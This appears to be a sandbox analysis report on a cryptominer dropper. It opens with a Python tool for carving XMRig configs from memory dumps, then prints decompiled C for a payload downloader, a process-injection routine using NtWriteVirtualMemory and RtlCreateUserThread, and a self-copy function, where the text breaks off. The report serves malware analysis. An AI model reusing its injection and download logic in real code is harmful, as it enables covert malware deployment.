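# the way a dump would carry them.
SAMPLE_CONFIG = {
    "api": {"id": None, "worker-id": None},
    "http": {"enabled": False},
    "autosave": False, "background": False, "colors": True,
    "randomx": {"init": 1, "numa": True},
    "cpu": {
        "enabled": True, "huge-pages": True, "hw-aes": None, "priority": None,
        "memory-pool": False, "asm": True, "argon2-impl": None,
        "cpu-profile": {"threads": 4}, "rx/0": "cpu-profile", "cn/r": "cpu-profile",
    },
    "donate-level": 1, "donate-over-proxy": 0, "log-file": None,
    "pools": [{
        "algo": None, "coin": "monero", "url": "pool.example.invalid:3333",
        "user": "WALLET_PLACEHOLDER", "pass": "x", "rig-id": None, "nicehash": False,
        "keepalive": True, "enabled": True, "tls": False, "tls-fingerprint": None,
        "daemon": False, "self-select": None,
    }],
    "print-time": 60, "health-print-time": 60, "retries": 5, "retry-pause": 5,
    "syslog": False, "user-agent": None, "version": 1, "watch": False,
}
SAMPLE_DUMP = (b"\x00" * 16 + b"C:\\ProgramData\\LKBNMTFJgl\\cfg\x00"
               + json.dumps(SAMPLE_CONFIG).encode() + b"\x00" * 8)

# Template-only buffer, the state the report's strings are in: keys without values.
TEMPLATE_ONLY = b'{"api": {$"donate-level": $"cpu-profile": {$"rx/0": "cpu-profile",'

if __name__ == "__main__":
    print(marker_hits(SAMPLE_DUMP))
    print(json.dumps(extract_xmrig_configs(SAMPLE_DUMP), indent=2))
    print(marker_hits(TEMPLATE_ONLY), extract_xmrig_configs(TEMPLATE_ONLY))
```

Run against a real dump, a high marker count with an empty config list is the expected result for a process that has not yet assembled the file; the dropped cfg itself, or the memory of the process after the NtWriteFile above, is where the carve succeeds.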

                                                                                                        C-Code - Quality: 95%
                                                                                                        			E00404B00(void* __ecx, void* __edx, void* __eflags, char* _a4) {
                                                                                                        				void* _v8;
                                                                                                        				void _v12;
                                                                                                        				void* _v16;
                                                                                                        				void* _v20;
                                                                                                        				long _v24;
                                                                                                        				long _v28;
                                                                                                        				long _v32;
                                                                                                        				char* _v36;
                                                                                                        				char* _v40;
                                                                                                        				char* _v44;
                                                                                                        				char* _v48;
                                                                                                        				char* _v52;
                                                                                                        				intOrPtr _v56;
                                                                                                        				intOrPtr _v64;
                                                                                                        				char* _v68;
                                                                                                        				short _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				intOrPtr _v96;
                                                                                                        				intOrPtr _v104;
                                                                                                        				char _v108;
                                                                                                        				void* _v112;
                                                                                                        				long _t54;
                                                                                                        				int _t55;
                                                                                                        				void* _t61;
                                                                                                        				void* _t62;
                                                                                                        				void* _t66;
                                                                                                        				void* _t71;
                                                                                                        				int _t78;
                                                                                                        				long _t87;
                                                                                                        				char* _t91;
                                                                                                        				long _t108;
                                                                                                        				void* _t111;
                                                                                                        				char* _t118;
                                                                                                        				long _t119;
                                                                                                        				char* _t123;
                                                                                                        				void* _t126;
                                                                                                        				void* _t128;
                                                                                                        				void* _t134;
                                                                                                        				void* _t136;
                                                                                                        				void* _t137;
                                                                                                        				void* _t138;
                                                                                                        				void* _t139;
                                                                                                        				void* _t140;
                                                                                                        
                                                                                                        				E00401BB0( &_v108, 0, 0x38);
                                                                                                        				_t118 = _a4;
                                                                                                        				_v24 = 0;
                                                                                                        				_t108 = 0;
                                                                                                        				_v112 = 0x3c;
                                                                                                        				_v92 = 0xffffffff;
                                                                                                        				_v104 = 0xffffffff;
                                                                                                        				_v64 = 0xffffffff;
                                                                                                        				_v56 = 0xffffffff;
                                                                                                        				_t54 = E00401850(_t118);
                                                                                                        				_t136 = _t134 + 0x10;
                                                                                                        				_t55 = InternetCrackUrlA(_t118, _t54, 0,  &_v112); // executed
                                                                                                        				if(_t55 != 0) {
                                                                                                        					_t123 = E004015E0(_v92 + 1);
                                                                                                        					E00401BB0(_t123, 0, _v92 + 1);
                                                                                                        					E00401640(_t123, _v96, _v92);
                                                                                                        					_t137 = _t136 + 0x1c;
                                                                                                        					_t61 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0); // executed
                                                                                                        					_v8 = _t61;
                                                                                                        					if(_t61 != 0) {
                                                                                                        						_t62 = InternetConnectA(_t61, _t123, _v88, 0, 0, 3, 0, 0); // executed
                                                                                                        						_v20 = _t62;
                                                                                                        						_push(_t123);
                                                                                                        						if(_t62 != 0) {
                                                                                                        							E00401510();
                                                                                                        							E004018D0(_t118, "https://");
                                                                                                        							_t138 = _t137 + 0xc;
                                                                                                        							_v52 = "text/*";
                                                                                                        							_v48 = "application/exe";
                                                                                                        							_v44 = "application/zlib";
                                                                                                        							_t125 =  !=  ? 0x84ecf300 : 0x846cf300;
                                                                                                        							_v40 = "application/gzip";
                                                                                                        							_v36 = "application/applefile";
                                                                                                        							_v32 = 0;
                                                                                                        							_t66 = HttpOpenRequestA(_v20, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0); // executed
                                                                                                        							_t126 = _t66;
                                                                                                        							_v16 = _t126;
                                                                                                        							if(_t126 == 0) {
                                                                                                        								L26:
                                                                                                        								InternetCloseHandle(_v20);
                                                                                                        								InternetCloseHandle(_v8);
                                                                                                        								return 0;
                                                                                                        							} else {
                                                                                                        								_t71 = E004018D0(_t118, "https://");
                                                                                                        								_t139 = _t138 + 8;
                                                                                                        								if(_t71 == 0) {
                                                                                                        									L10:
                                                                                                        									if(HttpSendRequestA(_t126, 0, 0, 0, 0) == 0) {
                                                                                                        										goto L25;
                                                                                                        									} else {
                                                                                                        										_t119 = 0x400;
                                                                                                        										_t128 = E004015E0(0x400);
                                                                                                        										_t140 = _t139 + 4;
                                                                                                        										if(_t128 == 0) {
                                                                                                        											_t126 = _v16;
                                                                                                        											goto L25;
                                                                                                        										} else {
                                                                                                        											do {
                                                                                                        												_t78 = InternetReadFile(_v16, _t128 + _t108, _t119,  &_v24); // executed
                                                                                                        												if(_t78 == 0) {
                                                                                                        													if(GetLastError() != 0x7a) {
                                                                                                        														E00401510(_t128);
                                                                                                        														L23:
                                                                                                        														InternetCloseHandle(_v16);
                                                                                                        														InternetCloseHandle(_v20);
                                                                                                        														InternetCloseHandle(_v8);
                                                                                                        														return 0;
                                                                                                        													} else {
                                                                                                        														_t119 = _t119 + 0x400;
                                                                                                        														goto L17;
                                                                                                        													}
                                                                                                        												} else {
                                                                                                        													_t87 = _v24;
                                                                                                        													if(_t87 == 0) {
                                                                                                        														InternetCloseHandle(_v16); // executed
                                                                                                        														InternetCloseHandle(_v20);
                                                                                                        														_t111 = _v8;
                                                                                                        														InternetCloseHandle(_t111);
                                                                                                        														_t91 = E004018D0(_t128, ";End");
                                                                                                        														if(_t91 != 0) {
                                                                                                        															 *_t91 = 0;
                                                                                                        															return _t128;
                                                                                                        														} else {
                                                                                                        															E00401510(_t128);
                                                                                                        															InternetCloseHandle(_v16);
                                                                                                        															InternetCloseHandle(_v20);
                                                                                                        															InternetCloseHandle(_t111);
                                                                                                        															return 0;
                                                                                                        														}
                                                                                                        													} else {
                                                                                                        														_t108 = _t108 + _t87;
                                                                                                        														goto L17;
                                                                                                        													}
                                                                                                        												}
                                                                                                        												goto L27;
                                                                                                        												L17:
                                                                                                        												_t128 = E004016A0(_t128, _t119 + _t108);
                                                                                                        												_t140 = _t140 + 8;
                                                                                                        											} while (_t128 != 0);
                                                                                                        											goto L23;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								} else {
                                                                                                        									_v12 = 0;
                                                                                                        									_v28 = 4;
                                                                                                        									if(InternetQueryOptionA(_t126, 0x1f,  &_v12,  &_v28) == 0) {
                                                                                                        										L25:
                                                                                                        										InternetCloseHandle(_t126);
                                                                                                        										goto L26;
                                                                                                        									} else {
                                                                                                        										_v12 = _v12 | 0x00000180;
                                                                                                        										if(InternetSetOptionA(_t126, 0x1f,  &_v12, 4) == 0) {
                                                                                                        											goto L25;
                                                                                                        										} else {
                                                                                                        											goto L10;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							E00401510();
                                                                                                        							InternetCloseHandle(_v8);
                                                                                                        							return 0;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						E00401510(_t123);
                                                                                                        						return 0;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					return _t55;
                                                                                                        				}
                                                                                                        				L27:
                                                                                                        			}
                                                                                                        0x00404b10
                                                                                                        0x00404b15
                                                                                                        0x00404b1e
                                                                                                        0x00404b25
                                                                                                        0x00404b27
                                                                                                        0x00404b2e
                                                                                                        0x00404b35
                                                                                                        0x00404b3f
                                                                                                        0x00404b46
                                                                                                        0x00404b4d
                                                                                                        0x00404b52
                                                                                                        0x00404b57
                                                                                                        0x00404b5f
                                                                                                        0x00404b75
                                                                                                        0x00404b7c
                                                                                                        0x00404b88
                                                                                                        0x00404b8d
                                                                                                        0x00404b9d
                                                                                                        0x00404ba3
                                                                                                        0x00404ba8
                                                                                                        0x00404bcb
                                                                                                        0x00404bd1
                                                                                                        0x00404bd4
                                                                                                        0x00404bd7
                                                                                                        0x00404bf4
                                                                                                        0x00404c04
                                                                                                        0x00404c09
                                                                                                        0x00404c0c
                                                                                                        0x00404c15
                                                                                                        0x00404c21
                                                                                                        0x00404c28
                                                                                                        0x00404c2b
                                                                                                        0x00404c38
                                                                                                        0x00404c47
                                                                                                        0x00404c52
                                                                                                        0x00404c58
                                                                                                        0x00404c5a
                                                                                                        0x00404c5f
                                                                                                        0x00404db8
                                                                                                        0x00404dbb
                                                                                                        0x00404dca
                                                                                                        0x00404dd4
                                                                                                        0x00404c65
                                                                                                        0x00404c6b
                                                                                                        0x00404c70
                                                                                                        0x00404c75
                                                                                                        0x00404cb8
                                                                                                        0x00404cc9
                                                                                                        0x00000000
                                                                                                        0x00404ccf
                                                                                                        0x00404ccf
                                                                                                        0x00404cda
                                                                                                        0x00404cdc
                                                                                                        0x00404ce1
                                                                                                        0x00404dad
                                                                                                        0x00000000
                                                                                                        0x00404ce7
                                                                                                        0x00404ce7
                                                                                                        0x00404cf3
                                                                                                        0x00404cfb
                                                                                                        0x00404d11
                                                                                                        0x00404d86
                                                                                                        0x00404d8e
                                                                                                        0x00404d9a
                                                                                                        0x00404d9f
                                                                                                        0x00404da2
                                                                                                        0x00404dac
                                                                                                        0x00404d13
                                                                                                        0x00404d13
                                                                                                        0x00000000
                                                                                                        0x00404d13
                                                                                                        0x00404cfd
                                                                                                        0x00404cfd
                                                                                                        0x00404d02
                                                                                                        0x00404d31
                                                                                                        0x00404d40
                                                                                                        0x00404d42
                                                                                                        0x00404d46
                                                                                                        0x00404d4e
                                                                                                        0x00404d58
                                                                                                        0x00404d79
                                                                                                        0x00404d84
                                                                                                        0x00404d5a
                                                                                                        0x00404d5b
                                                                                                        0x00404d66
                                                                                                        0x00404d6b
                                                                                                        0x00404d6e
                                                                                                        0x00404d78
                                                                                                        0x00404d78
                                                                                                        0x00404d04
                                                                                                        0x00404d04
                                                                                                        0x00000000
                                                                                                        0x00404d04
                                                                                                        0x00404d02
                                                                                                        0x00000000
                                                                                                        0x00404d19
                                                                                                        0x00404d23
                                                                                                        0x00404d25
                                                                                                        0x00404d28
                                                                                                        0x00000000
                                                                                                        0x00404d2c
                                                                                                        0x00404ce1
                                                                                                        0x00404c77
                                                                                                        0x00404c7a
                                                                                                        0x00404c81
                                                                                                        0x00404c94
                                                                                                        0x00404db0
                                                                                                        0x00404db6
                                                                                                        0x00000000
                                                                                                        0x00404c9a
                                                                                                        0x00404c9a
                                                                                                        0x00404cb2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404cb2
                                                                                                        0x00404c94
                                                                                                        0x00404c75
                                                                                                        0x00404bd9
                                                                                                        0x00404bd9
                                                                                                        0x00404be5
                                                                                                        0x00404bf3
                                                                                                        0x00404bf3
                                                                                                        0x00404baa
                                                                                                        0x00404bab
                                                                                                        0x00404bbb
                                                                                                        0x00404bbb
                                                                                                        0x00404b66
                                                                                                        0x00404b66
                                                                                                        0x00404b66
                                                                                                        0x00000000

APIs
• InternetCrackUrlA.WININET(7519EA30,00000000,?), ref: 00404B57
• InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00404B9D
Strings
Memory Dump Source
• Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Internet$CrackOpen
• String ID: ;End$<$GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
• API String ID: 1262293563-2187584305
• Opcode ID: 23e4e6220e37005b9647c86211bdfdd0f6ddd9ca7a57cee8a5006670cd84cd84
• Instruction ID: b075b86cb3f3238e1b45add10c95dfbc6438ce08dd21614d055a406b181498c9
• Opcode Fuzzy Hash: 23e4e6220e37005b9647c86211bdfdd0f6ddd9ca7a57cee8a5006670cd84cd84
• Instruction Fuzzy Hash: D381B971E002097BEB11ABA1EC45FAF77B8EF84754F100176FA04F62D1D7799D108AA9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 80%
E004029E0(void* __ecx, void* _a4, intOrPtr _a8, void* _a12, long _a16, DWORD* _a20, intOrPtr _a24) {
	void* _v8;
	void* _v12;
	void* _v16;
	long _v20;
	void* _v24;
	long _v28;
	CHAR* _v32;
	struct HINSTANCE__* _v36;
	long* _v40;
	long _v44;
	void* _v48;
	long _v52;
	void* _v56;
	long _v60;
	long _v64;
	long _v68;
	long _v72;
	long _v76;
	void* _v80;
	long* _t104;
	long _t111;
	void* _t114;
	void* _t116;
	void* _t117;
	void* _t118;
	CHAR* _t128;
	signed short _t131;
	CHAR* _t133;
	_Unknown_base(*)()* _t134;
	long* _t135;
	intOrPtr _t136;
	CHAR* _t137;
	long* _t140;
	CHAR* _t141;
	CHAR* _t146;
	long _t148;
	CHAR* _t149;
	CHAR* _t160;
	long _t163;
	CHAR** _t164;
	void* _t167;
	void* _t169;
	void* _t172;
	struct HINSTANCE__* _t175;
	void* _t176;
	signed int _t177;
	CHAR* _t179;
	signed int _t184;
	CHAR* _t187;
	_Unknown_base(*)()** _t189;
	void* _t191;
	CHAR* _t192;
	CHAR* _t194;
	long* _t195;
	void* _t197;
	signed short* _t198;
	CHAR** _t200;
	long _t201;
	void* _t203;
	void* _t204;

	_t172 = __ecx;
	_t104 = _a20;
	_t185 = _a4;
	_v8 = 0;
	_v16 = 0;
	_v12 = 0;
	_v24 = 0;
	_v28 = 0;
	_v20 = 0;
	_v48 = 0;
	_v44 = 0;
	 *_t104 = 0;
	RtlImageNtHeader(_a4);
	_t195 = _t104;
	_v40 = _t195;
	if( *_t195 != 0x4550) {
		L5:
		return 0;
	} else {
		_v28 = _t195[0x14];
		_v56 = _a8;
		_v80 = 0x18;
		_v76 = 0;
		_v68 = 0;
		_v72 = 0;
		_v64 = 0;
		_v60 = 0;
		_v52 = 0;
		_t111 = NtOpenProcess( &_v8, 0x1fffff,  &_v80,  &_v56);
		if(_t111 != 0) {
			goto L5;
		} else {
			if( *0x5d1314 == _t111) {
				L6:
				_t114 = NtAllocateVirtualMemory(_v8,  &_v12, 0,  &_v28, 0x3000, 0x40); // executed
				__eflags = _t114;
				if(_t114 != 0) {
					goto L4;
				} else {
					_t116 = VirtualAlloc(_t114, _v28, 0x3000, 0x40); // executed
					_t169 = _t116;
					__eflags = _t169;
					if(_t169 == 0) {
						L43:
						__eflags = _v12;
						if(_v12 != 0) {
							 *0x5d10ac(_v8,  &_v12,  &_v20, 0x8000);
						}
						_t117 = _v8;
						__eflags = _t117;
						if(_t117 != 0) {
							NtClose(_t117);
							_t117 = _v8;
						}
						__eflags = _t169;
						if(_t169 != 0) {
							VirtualFree(_t169, 0, 0x8000);
							_t117 = _v8;
						}
						__eflags = _v24;
						_v20 = 0;
						if(_v24 != 0) {
							 *0x5d10ac(_t117,  &_v24,  &_v20, 0x8000);
						}
						_t118 = _v16;
						__eflags = _t118;
						if(_t118 != 0) {
							NtClose(_t118);
						}
						__eflags = 0;
						return 0;
					} else {
						E00401640(_t169, _t185, _v28);
						_t204 = _t203 + 0xc;
						_t187 = _t169 + _t195[0x20];
						__eflags = _t187;
						while(1) {
							_t128 = _t187[0xc];
							_v32 = _t187;
							__eflags = _t128;
							if(_t128 != 0) {
								goto L11;
							}
							__eflags = _t187[4] - _t128;
							if(_t187[4] == _t128) {
								_t135 = _v40;
								_t176 = _v12;
								_t191 = _a4;
								_t45 = _t135 + 0xa0; // 0x45dd842a
								_t46 = _t135 + 0x34; // 0x0
								_t136 =  *_t46;
								_t200 =  *_t45 + _t169;
								_v40 = _t176 - _t136;
								__eflags =  *_t200;
								_v36 = _t191 - _t136;
								if( *_t200 != 0) {
									do {
										_t192 = _t200[1];
										_t50 =  &(_t200[1]); // 0x45dd842e
										_t164 = _t50;
										_v32 = _t164;
										__eflags = _t192 - 8;
										if(_t192 >= 8) {
											_t184 = 0;
											_t194 =  &(_t192[0xfffffffffffffff8]) >> 1;
											__eflags = _t194;
											if(_t194 != 0) {
												asm("o16 nop [eax+eax]");
												do {
													_t177 =  *(_t200 + 8 + _t184 * 2) & 0x0000ffff;
													__eflags = _t177;
													if(_t177 != 0) {
														_t179 =  &(( *_t200)[_t177 & 0x00000fff]);
														_t57 =  &(_t179[_t169]);
														 *_t57 = _t179[_t169] + _v40 - _v36;
														__eflags =  *_t57;
													}
													_t184 = _t184 + 1;
													__eflags = _t184 - _t194;
												} while (_t184 < _t194);
												_t164 = _v32;
											}
										}
										_t200 = _t200 +  *_t164;
										__eflags =  *_t200;
									} while ( *_t200 != 0);
									_t176 = _v12;
									_t191 = _a4;
								}
								_t137 = NtWriteVirtualMemory(_v8, _t176, _t169, _v28, 0); // executed
								__eflags = _t137;
								if(_t137 < 0) {
									goto L43;
								} else {
									_t201 = _a16;
									_t140 = NtAllocateVirtualMemory(_v8,  &_v24, 0,  &_a16, 0x3000, 4); // executed
									__eflags = _t140;
									if(_t140 != 0) {
										goto L43;
									} else {
										_t141 = NtWriteVirtualMemory(_v8, _v24, _a12, _t201, _t140); // executed
										__eflags = _t141;
										if(_t141 < 0) {
											goto L43;
										} else {
											_t146 = RtlCreateUserThread(_v8, 0, 0, 0, 0, 0, _v12 - _t191 + _a24, _v24,  &_v16, 0); // executed
											__eflags = _t146;
											if(_t146 < 0) {
												goto L43;
											} else {
												asm("xorps xmm0, xmm0");
												asm("movlpd [ebp-0x2c], xmm0");
												_t148 = NtWaitForSingleObject(_v16, 0,  &_v48);
												__eflags = _t148 - 0x102;
												if(_t148 == 0x102) {
													while(1) {
														_t160 =  *0x5d2118; // 0x0
														__eflags = _t160;
														if(_t160 != 0) {
															break;
														}
														Sleep(0xbb8); // executed
														_t163 = NtWaitForSingleObject(_v16, 0,  &_v48);
														__eflags = _t163 - 0x102;
														if(_t163 == 0x102) {
															continue;
														} else {
														}
														goto L41;
													}
													TerminateThread(_v16, 0);
												}
												L41:
												_t149 = GetExitCodeThread(_v16, _a20);
												__eflags = _t149;
												if(_t149 == 0) {
													goto L43;
												} else {
													NtClose(_v16);
													 *0x5d10ac(_v8,  &_v12,  &_v20, 0x8000);
													NtClose(_v8);
													VirtualFree(_t169, 0, 0x8000);
													_v20 = 0;
													 *0x5d10ac(_v8,  &_v24,  &_v20, 0x8000);
													return 1;
												}
											}
										}
									}
                                                                                                        											}
                                                                                                        										} else {
                                                                                                        											goto L11;
                                                                                                        										}
                                                                                                        										goto L54;
                                                                                                        										L11:
                                                                                                        										_t175 = E00408B00( &(_t128[_t169]));
                                                                                                        										_t204 = _t204 + 4;
                                                                                                        										_v36 = _t175;
                                                                                                        										__eflags = _t175;
                                                                                                        										if(_t175 == 0) {
                                                                                                        											goto L43;
                                                                                                        										} else {
                                                                                                        											_t197 = _t169 +  *_t187;
                                                                                                        											_t189 = _t169 + _t187[0x10];
                                                                                                        											__eflags = _t197 - _t169;
                                                                                                        											_t198 =  ==  ? _t189 : _t197;
                                                                                                        											__eflags = _t198 - _t169;
                                                                                                        											if(_t198 == _t169) {
                                                                                                        												goto L43;
                                                                                                        											} else {
                                                                                                        												_t131 =  *_t198;
                                                                                                        												__eflags = _t131;
                                                                                                        												if(__eflags == 0) {
                                                                                                        													L19:
                                                                                                        													_t187 =  &(_v32[0x14]);
                                                                                                        													continue;
                                                                                                        												} else {
                                                                                                        													L14:
                                                                                                        													L14:
                                                                                                        													if(__eflags >= 0) {
                                                                                                        														_t133 = _t131 + 2 + _t169;
                                                                                                        														__eflags = _t133;
                                                                                                        													} else {
                                                                                                        														_t133 = _t131 & 0x0000ffff;
                                                                                                        													}
                                                                                                        													_t134 = GetProcAddress(_t175, _t133);
                                                                                                        													 *_t189 = _t134;
                                                                                                        													__eflags = _t134;
                                                                                                        													if(_t134 == 0) {
                                                                                                        														goto L43;
                                                                                                        													}
                                                                                                        													_t131 = _t198[2];
                                                                                                        													_t198 =  &(_t198[2]);
                                                                                                        													_t175 = _v36;
                                                                                                        													_t189 = _t189 + 4;
                                                                                                        													__eflags = _t131;
                                                                                                        													if(__eflags != 0) {
                                                                                                        														goto L14;
                                                                                                        													} else {
                                                                                                        														goto L19;
                                                                                                        													}
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        										goto L54;
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							_t167 = E00408270(_t172, _v8);
                                                                                                        							_t203 = _t203 + 4;
                                                                                                        							if(_t167 != 0) {
                                                                                                        								goto L6;
                                                                                                        							} else {
                                                                                                        								L4:
                                                                                                        								NtClose(_v8);
                                                                                                        								goto L5;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L54:
                                                                                                        			}

Instruction address column for this function (the decompiler's side pane, detached from the code lines during extraction): addresses range from 0x004029e0 to 0x00402dc2.
                                                                                                        0x00402b2b
                                                                                                        0x00402b2e
                                                                                                        0x00402b30
                                                                                                        0x00000000
                                                                                                        0x00402b36
                                                                                                        0x00402b3b
                                                                                                        0x00402b3d
                                                                                                        0x00402b3f
                                                                                                        0x00402b41
                                                                                                        0x00402b44
                                                                                                        0x00402b46
                                                                                                        0x00000000
                                                                                                        0x00402b4c
                                                                                                        0x00402b4c
                                                                                                        0x00402b4e
                                                                                                        0x00402b50
                                                                                                        0x00402b80
                                                                                                        0x00402b83
                                                                                                        0x00000000
                                                                                                        0x00402b52
                                                                                                        0x00000000
                                                                                                        0x00402b52
                                                                                                        0x00402b52
                                                                                                        0x00402b5c
                                                                                                        0x00402b5c
                                                                                                        0x00402b54
                                                                                                        0x00402b54
                                                                                                        0x00402b54
                                                                                                        0x00402b60
                                                                                                        0x00402b66
                                                                                                        0x00402b68
                                                                                                        0x00402b6a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402b70
                                                                                                        0x00402b73
                                                                                                        0x00402b76
                                                                                                        0x00402b79
                                                                                                        0x00402b7c
                                                                                                        0x00402b7e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402b7e
                                                                                                        0x00402b50
                                                                                                        0x00402b46
                                                                                                        0x00000000
                                                                                                        0x00402b30
                                                                                                        0x00402b0f
                                                                                                        0x00402af4
                                                                                                        0x00402aa0
                                                                                                        0x00402aa3
                                                                                                        0x00402aa8
                                                                                                        0x00402aad
                                                                                                        0x00000000
                                                                                                        0x00402aaf
                                                                                                        0x00402aaf
                                                                                                        0x00402ab2
                                                                                                        0x00000000
                                                                                                        0x00402ab2
                                                                                                        0x00402aad
                                                                                                        0x00402a9e
                                                                                                        0x00402a96
                                                                                                        0x00000000

APIs
• RtlImageNtHeader.NTDLL(?), ref: 00402A2D
• NtOpenProcess.NTDLL(00000000,001FFFFF,?,?), ref: 00402A8E
• NtClose.NTDLL(00000000), ref: 00402AB2
• NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00003000,00000040), ref: 00402AD4
• VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040,00000000), ref: 00402AEA
• GetProcAddress.KERNEL32(00000000,-00000002), ref: 00402B60
• NtWriteVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00000000), ref: 00402C0A
• NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00003000,00000004), ref: 00402C2F
• NtWriteVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00000000), ref: 00402C48
• RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00402C75
• NtWaitForSingleObject.NTDLL(00000000,00000000,00000000), ref: 00402C94
• Sleep.KERNELBASE(00000BB8), ref: 00402CB5
• NtWaitForSingleObject.NTDLL(00000000,00000000,00000000), ref: 00402CC0
• TerminateThread.KERNEL32(00000000,00000000), ref: 00402CD4
• GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00402CE0
• NtClose.NTDLL(00000000), ref: 00402CED
• NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402D03
• NtClose.NTDLL(00000000), ref: 00402D0C
  • Part of subcall function 00408270: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00403432), ref: 00408285
  • Part of subcall function 00408270: GetProcAddress.KERNEL32(00000000), ref: 0040828C
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402D1A
• NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402D37
• NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402D5F
• NtClose.NTDLL(00000000), ref: 00402D6D
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402D82
• NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402DA6
• NtClose.NTDLL(00000000), ref: 00402DB4
Memory Dump Source
• Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Virtual$Memory$Free$Close$Thread$AddressAllocateObjectProcSingleWaitWrite$AllocCodeCreateExitHandleHeaderImageModuleOpenProcessSleepTerminateUser
• String ID:
• API String ID: 4217436290-0
• Opcode ID: 4a900b3df5d8d8e8cb2b3ece97f72b44356a237bbd3b48ae2c28c37453d27ef7
• Instruction ID: aa250f91bc0df1c709c0f0294cc1af27058bb64088126e2459afa89f473692c1
• Opcode Fuzzy Hash: 4a900b3df5d8d8e8cb2b3ece97f72b44356a237bbd3b48ae2c28c37453d27ef7
• Instruction Fuzzy Hash: 53C14C71A01209EFDB20DF95DD49BEEBBB9FF04300F14406AE905B6290D775AE44DB98
Uniqueness
Uniqueness Score: -1.00%
C-Code - Quality: 42%
E00406340(intOrPtr _a4) {
	void* _v8;
	void* _v12;
	long _v16;
	long _v20;
	long _v24;
	long _v28;
	long _v32;
	void* _v36;
	long _v40;
	long _v44;
	intOrPtr _v48;
	char* _v52;
	long _v56;
	void* _v60;
	long _v64;
	void* _v68;
	char _v76;
	char _v84;
	short _v1108;
	long _t59;
	long _t69;
	long* _t70;
	void* _t71;
	void* _t74;
	long _t83;
	signed int _t85;
	void* _t90;
	intOrPtr _t104; // used below but missing from the decompiler's declarations
	void* _t109;

	_v8 = 0;
	asm("xorps xmm0, xmm0");
	_v12 = 0;
	_v60 = 0;
	asm("movups [ebp-0x34], xmm0");
	_v40 = 0;
	_v36 = 0;
	_v32 = 0;
	_v28 = 0;
	_v24 = 0;
	_v20 = 0;
	_v16 = 0;
	_v68 = 0;
	_v64 = 0;
	asm("movq [ebp-0x48], xmm0");
	asm("movq [ebp-0x50], xmm0");
	// Path of the running executable, up to 0x200 wide characters.
	_t59 = GetModuleFileNameW(0,  &_v1108, 0x200);
	if(_t59 == 0 || _t59 == 0x200) { // failed or truncated path
		L6:
		return 0;
	} else {
		// Call through an unresolved import pointer with (path, &_v76, 0, 0); 1 means success.
		_push(0);
		_push(0);
		_push( &_v76);
		_push( &_v1108);
		if( *0x5d10b8() != 1) {
			goto L6;
		} else {
			// OBJECT_ATTRIBUTES: Length = 0x18 (x86), ObjectName = &_v76, Attributes = 0x40 (OBJ_CASE_INSENSITIVE).
			_v60 = 0x18;
			_v52 =  &_v76;
			_v56 = 0;
			_v48 = 0x40;
			_v44 = 0;
			_v40 = 0;
			// Open its own image: FILE_GENERIC_READ (0x120089), FILE_ATTRIBUTE_NORMAL, share read/write,
			// FILE_OPEN, FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE (0x60).
			_t69 = NtCreateFile( &_v8, 0x120089,  &_v60,  &_v36,  &_v68, 0x80, 3, 1, 0x60, 0, 0); // executed
			if(_t69 != 0) {
				goto L6;
			} else {
				_t70 =  &_v28;
				__imp__GetFileSizeEx(_v8, _t70);
				if(_t70 != 0) {
					// Buffer for the whole file: MEM_COMMIT | MEM_RESERVE (0x3000), PAGE_READWRITE (4).
					_t71 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
					_t109 = _t71;
					if(_t109 != 0) {
						// Unresolved import pointer; the argument layout matches NtReadFile (handle, event, apc, ctx, iosb, buffer, length, offset, key).
						_t74 =  *0x5d10bc(_v8, 0, 0, 0,  &_v36, _t109, _v28,  &_v20, 0); // executed
						if(_t74 == 0) {
							NtClose(_v8); // executed
							_t104 = _a4;
							// Same unresolved import as above, now applied to the destination path passed in _a4.
							_push(0);
							_push(0);
							_push( &_v84);
							_push(_a4);
							if( *0x5d10b8() == 1) {
								_v60 = 0x18;
								_v52 =  &_v84;
								_v56 = 0;
								_v48 = 0x40;
								_v44 = 0;
								_v40 = 0;
								// Create the destination: FILE_GENERIC_WRITE (0x120116), no sharing, FILE_SUPERSEDE (0).
